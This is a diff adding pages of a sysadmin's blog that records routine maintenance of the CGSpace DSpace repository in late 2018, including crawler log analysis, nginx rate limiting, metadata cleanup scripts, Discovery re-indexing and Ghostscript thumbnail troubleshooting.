+<li>Now at least the Tomcat Crawler Session Manager Valve seems to be forcing it to re-use some Tomcat sessions:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-04
+37721
+$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-04 | sort | uniq | wc -l
+15206
+</code></pre><ul>
+<li>I think we still need to limit more of the dynamic pages, like the &ldquo;most popular&rdquo; country, item, and author pages</li>
+<li>It seems these are popular too, and there is no fucking way Facebook needs that information, yet they are requesting thousands of them!</li>
+</ul>
+<pre tabindex="0"><code># grep &#39;face:b00c&#39; /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -c &#39;most-popular/&#39;
+7033
+</code></pre><ul>
+<li>I added the &ldquo;most-popular&rdquo; pages to the list that return <code>X-Robots-Tag: none</code> to try to inform bots not to index or follow those pages</li>
+<li>Also, I implemented an nginx rate limit of twelve requests per minute on all dynamic pages&hellip; I figure a human user might legitimately request one every five seconds</li>
+</ul>
+<h2 id="2018-11-05">2018-11-05</h2>
+<ul>
+<li>I wrote a small Python script <a href="https://gist.github.com/alanorth/4ff81d5f65613814a66cb6f84fdf1fc5">add-dc-rights.py</a> to add usage rights (<code>dc.rights</code>) to CGSpace items based on the CSV Hector gave me from MARLO:</li>
+</ul>
+<pre tabindex="0"><code>$ ./add-dc-rights.py -i /tmp/marlo.csv -db dspace -u dspace -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>The file <code>marlo.csv</code> was cleaned up and formatted in Open Refine</li>
+<li>165 of the items in their 2017 data are from CGSpace!</li>
+<li>I will add the data to CGSpace this week (done!)</li>
+<li>Jesus, is Facebook <em>trying</em> to be annoying? At least the Tomcat Crawler Session Manager Valve is working to force the bot to re-use its Tomcat sessions:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;05/Nov/2018&#34; | grep -c &#34;2a03:2880:11ff:&#34;
+29889
+# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-05
+29763
+# grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-05 | sort | uniq | wc -l
+1057
+# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;05/Nov/2018&#34; | grep &#34;2a03:2880:11ff:&#34; | grep -c -E &#34;(handle|bitstream)&#34;
+29896
+</code></pre><ul>
+<li>29,000 requests from Facebook and none of the requests are to the dynamic pages I rate limited yesterday!</li>
+<li>At least the Tomcat Crawler Session Manager Valve is working now&hellip;</li>
+</ul>
+<h2 id="2018-11-06">2018-11-06</h2>
+<ul>
+<li>I updated all the <a href="https://github.com/ilri/DSpace/wiki/Scripts">DSpace helper Python scripts</a> to validate against PEP 8 using Flake8</li>
+<li>While I was updating the <a href="https://gist.github.com/alanorth/ddd7f555f0e487fe0e9d3eb4ff26ce50">rest-find-collections.py</a> script I noticed it was using <code>expand=all</code> to get the collection and community IDs</li>
+<li>I realized I actually only need <code>expand=collections,subCommunities</code>, and I wanted to see how much overhead the extra expands created so I did three runs of each:</li>
+</ul>
+<pre tabindex="0"><code>$ time ./rest-find-collections.py 10568/27629 --rest-url https://dspacetest.cgiar.org/rest
+</code></pre><ul>
+<li>Average time with all expands was 14.3 seconds, and 12.8 seconds with <code>collections,subCommunities</code>, so <strong>1.5 seconds difference</strong>!</li>
+</ul>
+<h2 id="2018-11-07">2018-11-07</h2>
+<ul>
+<li>Update my <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> to use a database management class with Python contexts so that connections and cursors are automatically opened and closed</li>
+<li>Tag version 0.7.0 of the dspace-statistics-api</li>
+</ul>
+<h2 id="2018-11-08">2018-11-08</h2>
+<ul>
+<li>I deployed verison 0.7.0 of the dspace-statistics-api on DSpace Test (linode19) so I can test it for a few days (and check the Munin stats to see the change in database connections) before deploying on CGSpace</li>
+<li>I also enabled systemd&rsquo;s persistent journal by setting <a href="https://www.freedesktop.org/software/systemd/man/journald.conf.html"><code>Storage=persistent</code> in <em>journald.conf</em></a></li>
+<li>Apparently <a href="https://www.freedesktop.org/software/systemd/man/journald.conf.html">Ubuntu 16.04 defaulted to using rsyslog for boot records until early 2018</a>, so I removed <code>rsyslog</code> too</li>
+<li>Proof 277 IITA records on DSpace Test: <a href="https://dspacetest.cgiar.org/handle/10568/107871">IITA_ ALIZZY1802-csv_oct23</a>
+<ul>
+<li>There were a few issues with countries, a few language erorrs, a few whitespace errors, and then a handful of ISSNs in the ISBN field</li>
+</ul>
+</li>
+</ul>
+<h2 id="2018-11-11">2018-11-11</h2>
+<ul>
+<li>I added tests to the <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a>!</li>
+<li>It runs with Python 3.5, 3.6, and 3.7 using pytest, including automatically on Travis CI!</li>
+</ul>
+<h2 id="2018-11-13">2018-11-13</h2>
+<ul>
+<li>Help troubleshoot an issue with Judy Kimani submitting to the <a href="https://cgspace.cgiar.org/handle/10568/78">ILRI project reports, papers and documents</a> collection on CGSpace</li>
+<li>For some reason there is an existing group for the &ldquo;Accept/Reject&rdquo; workflow step, but it&rsquo;s empty</li>
+<li>I added Judy to the group and told her to try again</li>
+<li>Sisay changed his leave to be full days until December so I need to finish the IITA records that he was working on (<a href="https://dspacetest.cgiar.org/handle/10568/107871">IITA_ ALIZZY1802-csv_oct23</a>)</li>
+<li>Sisay had said there were a few PDFs missing and Bosede sent them this week, so I had to find those items on DSpace Test and add the bitstreams to the items manually</li>
+<li>As for the collection mappings I think I need to export the CSV from DSpace Test, add mappings for each type (ie Books go to IITA books collection, etc), then re-import to DSpace Test, then export from DSpace command line in &ldquo;migrate&rdquo; mode&hellip;</li>
+<li>From there I should be able to script the removal of the old DSpace Test collection so they just go to the correct IITA collections on import into CGSpace</li>
+</ul>
+<h2 id="2018-11-14">2018-11-14</h2>
+<ul>
+<li>Finally import the 277 IITA (ALIZZY1802) records to CGSpace</li>
+<li>I had to export them from DSpace Test and import them into a temporary collection on CGSpace first, then export the collection as CSV to map them to new owning collections (IITA books, IITA posters, etc) with OpenRefine because DSpace&rsquo;s <code>dspace export</code> command doesn&rsquo;t include the collections for the items!</li>
+<li>Delete all old IITA collections on DSpace Test and run <code>dspace cleanup</code> to get rid of all the bitstreams</li>
+</ul>
+<h2 id="2018-11-15">2018-11-15</h2>
+<ul>
+<li>Deploy version 0.8.1 of the <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> to CGSpace (linode18)</li>
+</ul>
+<h2 id="2018-11-18">2018-11-18</h2>
+<ul>
+<li>Request invoice from Wild Jordan for their meeting venue in January</li>
+</ul>
+<h2 id="2018-11-19">2018-11-19</h2>
+<ul>
+<li>Testing corrections and deletions for AGROVOC (<code>dc.subject</code>) that Sisay and Peter were working on earlier this month:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-11-19-correct-agrovoc.csv -f dc.subject -t correct -m 57 -db dspace -u dspace -p &#39;fuu&#39; -d
+$ ./delete-metadata-values.py -i 2018-11-19-delete-agrovoc.csv -f dc.subject -m 57 -db dspace -u dspace -p &#39;fuu&#39; -d
+</code></pre><ul>
+<li>Then I ran them on both CGSpace and DSpace Test, and started a full Discovery re-index on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+</code></pre><ul>
+<li>Generate a new list of the top 1500 AGROVOC subjects on CGSpace to send to Peter and Sisay:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 57 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2018-11-19-top-1500-subject.csv WITH CSV HEADER;
+</code></pre><h2 id="2018-11-20">2018-11-20</h2>
+<ul>
+<li>The Discovery re-indexing on CGSpace never finished yesterday&hellip; the command died after six minutes</li>
+<li>The <code>dspace.log.2018-11-19</code> shows this at the time:</li>
+</ul>
+<pre tabindex="0"><code>2018-11-19 15:23:04,221 ERROR com.atmire.dspace.discovery.AtmireSolrService @ DSpace kernel cannot be null
+java.lang.IllegalStateException: DSpace kernel cannot be null
+        at org.dspace.utils.DSpace.getServiceManager(DSpace.java:63)
+        at org.dspace.utils.DSpace.getSingletonService(DSpace.java:87)
+        at com.atmire.dspace.discovery.AtmireSolrService.buildDocument(AtmireSolrService.java:102)
+        at com.atmire.dspace.discovery.AtmireSolrService.indexContent(AtmireSolrService.java:815)
+        at com.atmire.dspace.discovery.AtmireSolrService.updateIndex(AtmireSolrService.java:884)
+        at org.dspace.discovery.SolrServiceImpl.createIndex(SolrServiceImpl.java:370)
+        at org.dspace.discovery.IndexClient.main(IndexClient.java:117)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+2018-11-19 15:23:04,223 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Processing (4629 of 76007): 72731
+</code></pre><ul>
+<li>I looked in the Solr log around that time and I don&rsquo;t see anything&hellip;</li>
+<li>Working on Udana&rsquo;s WLE records from last month, first the sixteen records in <a href="https://dspacetest.cgiar.org/handle/10568/108254">2018-11-20 RDL Temp</a>
+<ul>
+<li>these items will go to the <a href="https://dspacetest.cgiar.org/handle/10568/81592">Restoring Degraded Landscapes collection</a></li>
+<li>a few items missing DOIs, but they are easily available on the publication page</li>
+<li>clean up DOIs to use &ldquo;<a href="https://doi.org">https://doi.org</a>&rdquo; format</li>
+<li>clean up some cg.identifier.url to remove unneccessary query strings</li>
+<li>remove columns with no metadata (river basin, place, target audience, isbn, uri, publisher, ispartofseries, subject)</li>
+<li>fix column with invalid spaces in metadata field name (cg. subject. wle)</li>
+<li>trim and collapse whitespace in all fields</li>
+<li>remove some weird Unicode characters (0xfffd) from abstracts, citations, and titles using Open Refine: <code>value.replace('�','')</code></li>
+<li>add dc.rights to some fields that I noticed while checking DOIs</li>
+</ul>
+</li>
+<li>Then the 24 records in <a href="https://dspacetest.cgiar.org/handle/10568/108271">2018-11-20 VRC Temp</a>
+<ul>
+<li>these items will go to the <a href="https://dspacetest.cgiar.org/handle/10568/81589">Variability, Risks and Competing Uses collection</a></li>
+<li>trim and collapse whitespace in all fields (lots in WLE subject!)</li>
+<li>clean up some cg.identifier.url fields that had unneccessary anchors in their links</li>
+<li>clean up DOIs to use &ldquo;<a href="https://doi.org">https://doi.org</a>&rdquo; format</li>
+<li>fix column with invalid spaces in metadata field name (cg. subject. wle)</li>
+<li>remove columns with no metadata (place, target audience, isbn, uri, publisher, ispartofseries, subject)</li>
+<li>remove some weird Unicode characters (0xfffd) from abstracts, citations, and titles using Open Refine: <code>value.replace('�','')</code></li>
+<li>I notice a few items using DOIs pointing at ICARDA&rsquo;s DSpace like: <a href="https://doi.org/20.500.11766/8178">https://doi.org/20.500.11766/8178</a>, which then points at the &ldquo;real&rdquo; DOI on the publisher&rsquo;s site&hellip; these should be using the real DOI instead of ICARDA&rsquo;s &ldquo;fake&rdquo; Handle DOI</li>
+<li>Some items missing DOIs, but they clearly have them if you look at the publisher&rsquo;s site</li>
+</ul>
+</li>
+</ul>
+<h2 id="2018-11-22">2018-11-22</h2>
+<ul>
+<li>Tezira is having problems submitting to the <a href="https://cgspace.cgiar.org/handle/10568/24452">ILRI brochures</a> collection for some reason
+<ul>
+<li>Judy Kimani was having issues resuming submissions in another ILRI collection recently, and the issue there was due to an empty group defined for the &ldquo;accept/reject&rdquo; step (aka workflow step 1)</li>
+<li>The error then was &ldquo;authorization denied for workflow step 1&rdquo; where &ldquo;workflow step 1&rdquo; was the &ldquo;accept/reject&rdquo; step, which had a group defined, but was empty</li>
+<li>Adding her to this group solved her issues</li>
+<li>Tezira says she&rsquo;s also getting the same &ldquo;authorization denied&rdquo; error for workflow step 1 when resuming submissions, so I told Abenet to delete the empty group</li>
+</ul>
+</li>
+</ul>
+<h2 id="2018-11-26">2018-11-26</h2>
+<ul>
+<li><a href="https://cgspace.cgiar.org/handle/10568/97709">This WLE item</a> is issued on 2018-10 and accessioned on 2018-10-22 but does not show up in the <a href="https://cgspace.cgiar.org/handle/10568/41888">WLE R4D Learning Series</a> collection on CGSpace for some reason, and therefore does not show up on the WLE publication website</li>
+<li>I tried to remove that collection from Discovery and do a simple re-index:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace index-discovery -r 10568/41888
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
+</code></pre><ul>
+<li>&hellip; but the item still doesn&rsquo;t appear in the collection</li>
+<li>Now I will try a full Discovery re-index:</li>
+</ul>
+<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+</code></pre><ul>
+<li>Ah, Marianne had set the item as private when she uploaded it, so it was still private</li>
+<li>I made it public and now it shows up in the collection list</li>
+<li>More work on the AReS terms of reference for CodeObia</li>
+<li>Erica from AgriKnowledge emailed me to say that they have implemented the changes in their item page UI so that they include the permanent identifier on items harvested from CGSpace, for example: <a href="https://www.agriknowledge.org/concern/generics/wd375w33s">https://www.agriknowledge.org/concern/generics/wd375w33s</a></li>
+</ul>
+<h2 id="2018-11-27">2018-11-27</h2>
+<ul>
+<li>Linode alerted me that the outbound traffic rate on CGSpace (linode19) was very high</li>
+<li>The top users this morning are:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;27/Nov/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    229 46.101.86.248
+    261 66.249.64.61
+    447 66.249.64.59
+    541 207.46.13.77
+    548 40.77.167.97
+    564 35.237.175.180
+    595 40.77.167.135
+    611 157.55.39.91
+   4564 205.186.128.185
+   4564 70.32.83.92
+</code></pre><ul>
+<li>We know 70.32.83.92 is CCAFS harvester on MediaTemple, but 205.186.128.185 is new appears to be a new CCAFS harvester</li>
+<li>I think we might want to prune some old accounts from CGSpace, perhaps users who haven&rsquo;t logged in in the last two years would be a conservative bunch:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace dsrun org.dspace.eperson.Groomer -a -b 11/27/2016 | wc -l
+409
+$ dspace dsrun org.dspace.eperson.Groomer -a -b 11/27/2016 -d
+</code></pre><ul>
+<li>This deleted about 380 users, skipping those who have submissions in the repository</li>
+<li>Judy Kimani was having problems taking tasks in the <a href="https://cgspace.cgiar.org/handle/10568/78">ILRI project reports, papers and documents</a> collection again
+<ul>
+<li>The workflow step 1 (accept/reject) is now undefined for some reason</li>
+<li>Last week the group was defined, but empty, so we added her to the group and she was able to take the tasks</li>
+<li>Since then it looks like the group was deleted, so now she didn&rsquo;t have permission to take or leave the tasks in her pool</li>
+<li>We added her back to the group, then she was able to take the tasks, and then we removed the group again, as we generally don&rsquo;t use this step in CGSpace</li>
+</ul>
+</li>
+<li>Help Marianne troubleshoot some issue with items in their WLE collections and the WLE publicatons website</li>
+</ul>
+<h2 id="2018-11-28">2018-11-28</h2>
+<ul>
+<li>Change the usage rights text a bit based on Maria Garruccio&rsquo;s feedback on &ldquo;all rights reserved&rdquo; (<a href="https://github.com/ilri/DSpace/pull/404">#404</a>)</li>
+<li>Run all system updates on DSpace Test (linode19) and reboot the server</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2018-12/index.html b/docs/2018-12/index.html
new file mode 100644
index 000000000..732345182
--- /dev/null
+++ b/docs/2018-12/index.html
@@ -0,0 +1,648 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="December, 2018" />
+<meta property="og:description" content="2018-12-01
+
+Switch CGSpace (linode18) to use OpenJDK instead of Oracle JDK
+I manually installed OpenJDK, then removed Oracle JDK, then re-ran the Ansible playbook to update all configuration files, etc
+Then I ran all system updates and restarted the server
+
+2018-12-02
+
+I noticed that there is another issue with PDF thumbnails on CGSpace, and I see there was another Ghostscript vulnerability last week
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2018-12/" />
+<meta property="article:published_time" content="2018-12-02T02:09:30+02:00" />
+<meta property="article:modified_time" content="2019-10-28T13:39:25+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="December, 2018"/>
+<meta name="twitter:description" content="2018-12-01
+
+Switch CGSpace (linode18) to use OpenJDK instead of Oracle JDK
+I manually installed OpenJDK, then removed Oracle JDK, then re-ran the Ansible playbook to update all configuration files, etc
+Then I ran all system updates and restarted the server
+
+2018-12-02
+
+I noticed that there is another issue with PDF thumbnails on CGSpace, and I see there was another Ghostscript vulnerability last week
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "December, 2018",
+  "url": "https://alanorth.github.io/cgspace-notes/2018-12/",
+  "wordCount": "3096",
+  "datePublished": "2018-12-02T02:09:30+02:00",
+  "dateModified": "2019-10-28T13:39:25+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2018-12/">
+
+    <title>December, 2018 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-12/">December, 2018</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2018-12-02T02:09:30+02:00">Sun Dec 02, 2018</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-12-01">2018-12-01</h2>
+<ul>
+<li>Switch CGSpace (linode18) to use OpenJDK instead of Oracle JDK</li>
+<li>I manually installed OpenJDK, then removed Oracle JDK, then re-ran the <a href="http://github.com/ilri/rmg-ansible-public">Ansible playbook</a> to update all configuration files, etc</li>
+<li>Then I ran all system updates and restarted the server</li>
+</ul>
+<h2 id="2018-12-02">2018-12-02</h2>
+<ul>
+<li>I noticed that there is another issue with PDF thumbnails on CGSpace, and I see there was another <a href="https://usn.ubuntu.com/3831-1/">Ghostscript vulnerability last week</a></li>
+</ul>
+<ul>
+<li>The error when I try to manually run the media filter for one item from the command line:</li>
+</ul>
+<pre tabindex="0"><code>org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d&#34; &#34;-f/tmp/magick-129895Bmp44lvUfxo&#34; &#34;-f/tmp/magick-12989C0QFG51fktLF&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
+org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d&#34; &#34;-f/tmp/magick-129895Bmp44lvUfxo&#34; &#34;-f/tmp/magick-12989C0QFG51fktLF&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
+        at org.im4java.core.Info.getBaseInfo(Info.java:360)
+        at org.im4java.core.Info.&lt;init&gt;(Info.java:151)
+        at org.dspace.app.mediafilter.ImageMagickThumbnailFilter.getImageFile(ImageMagickThumbnailFilter.java:142)
+        at org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter.getDestinationStream(ImageMagickPdfThumbnailFilter.java:24)
+        at org.dspace.app.mediafilter.FormatFilter.processBitstream(FormatFilter.java:170)
+        at org.dspace.app.mediafilter.MediaFilterManager.filterBitstream(MediaFilterManager.java:475)
+        at org.dspace.app.mediafilter.MediaFilterManager.filterItem(MediaFilterManager.java:429)
+        at org.dspace.app.mediafilter.MediaFilterManager.applyFiltersItem(MediaFilterManager.java:401)
+        at org.dspace.app.mediafilter.MediaFilterManager.main(MediaFilterManager.java:237)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+</code></pre><ul>
+<li>A comment on <a href="https://stackoverflow.com/questions/53560755/ghostscript-9-26-update-breaks-imagick-readimage-for-multipage-pdf">StackOverflow question</a> from yesterday suggests it might be a bug with the <code>pngalpha</code> device in Ghostscript and <a href="https://bugs.ghostscript.com/show_bug.cgi?id=699815">links to an upstream bug</a></li>
+<li>I think we need to wait for a fix from Ubuntu</li>
+<li>For what it&rsquo;s worth, I get the same error on my local Arch Linux environment with Ghostscript 9.26:</li>
+</ul>
+<pre tabindex="0"><code>$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=pngalpha -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Food\ safety\ Kenya\ fruits.pdf
+DEBUG: FC_WEIGHT didn&#39;t match
+zsh: segmentation fault (core dumped)  gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
+</code></pre><ul>
+<li>When I replace the <code>pngalpha</code> device with <code>png16m</code> as suggested in the StackOverflow comments it works:</li>
+</ul>
+<pre tabindex="0"><code>$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=png16m -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Food\ safety\ Kenya\ fruits.pdf
+DEBUG: FC_WEIGHT didn&#39;t match
+</code></pre><ul>
+<li>Start proofing the latest round of 226 IITA archive records that Bosede sent last week and Sisay uploaded to DSpace Test this weekend (<a href="https://dspacetest.cgiar.org/handle/10568/108298">IITA_Dec_1_1997 aka Daniel1807</a>)
+<ul>
+<li>One item missing the authorship type</li>
+<li>Some invalid countries (smart quotes, mispellings)</li>
+<li>Added countries to some items that mentioned research in particular countries in their abstracts</li>
+<li>One item had &ldquo;MADAGASCAR&rdquo; for ISI Journal</li>
+<li>Minor corrections in IITA subject (LIVELIHOOD→LIVELIHOODS)</li>
+<li>Trim whitespace in abstract field</li>
+<li>Fix some sponsors (though some with &ldquo;Governments of Canada&rdquo; etc I&rsquo;m not sure why those are plural)</li>
+<li>Eighteen items had <code>en||fr</code> for the language, but the content was only in French so changed them to just <code>fr</code></li>
+<li>Six items had encoding errors in French text so I will ask Bosede to re-do them carefully</li>
+<li>Correct and normalize a few AGROVOC subjects</li>
+</ul>
+</li>
+<li>Expand my &ldquo;encoding error&rdquo; detection GREL to include <code>~</code> as I saw a lot of that in some copy pasted French text recently:</li>
+</ul>
+<pre tabindex="0"><code>or(
+  isNotNull(value.match(/.*\uFFFD.*/)),
+  isNotNull(value.match(/.*\u00A0.*/)),
+  isNotNull(value.match(/.*\u200A.*/)),
+  isNotNull(value.match(/.*\u2019.*/)),
+  isNotNull(value.match(/.*\u00b4.*/)),
+  isNotNull(value.match(/.*\u007e.*/))
+)
+</code></pre><h2 id="2018-12-03">2018-12-03</h2>
+<ul>
+<li>I looked at the DSpace Ghostscript issue more and it seems to only affect certain PDFs&hellip;</li>
+<li>I can successfully generate a thumbnail for another recent item (<a href="https://hdl.handle.net/10568/98394">10568/98394</a>), but not for <a href="https://hdl.handle.net/10568/98390">10568/98930</a></li>
+<li>Even manually on my Arch Linux desktop with ghostscript 9.26-1 and the <code>pngalpha</code> device, I can generate a thumbnail for the first one (10568/98394):</li>
+</ul>
+<pre tabindex="0"><code>$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=pngalpha -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf
+</code></pre><ul>
+<li>So it seems to be something about the PDFs themselves, perhaps related to alpha support?</li>
+<li>The first item (10568/98394) has the following information:</li>
+</ul>
+<pre tabindex="0"><code>$ identify Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf\[0\]
+Info Note Mainstreaming gender and social differentiation into CCAFS research activities in West Africa-converted.pdf[0]=&gt;Info Note Mainstreaming gender and social differentiation into CCAFS research activities in West Africa-converted.pdf PDF 595x841 595x841+0+0 16-bit sRGB 107443B 0.000u 0:00.000
+identify: CorruptImageProfile `xmp&#39; @ warning/profile.c/SetImageProfileInternal/1746.
+</code></pre><ul>
+<li>And wow, I can&rsquo;t even run ImageMagick&rsquo;s <code>identify</code> on the first page of the second item (10568/98930):</li>
+</ul>
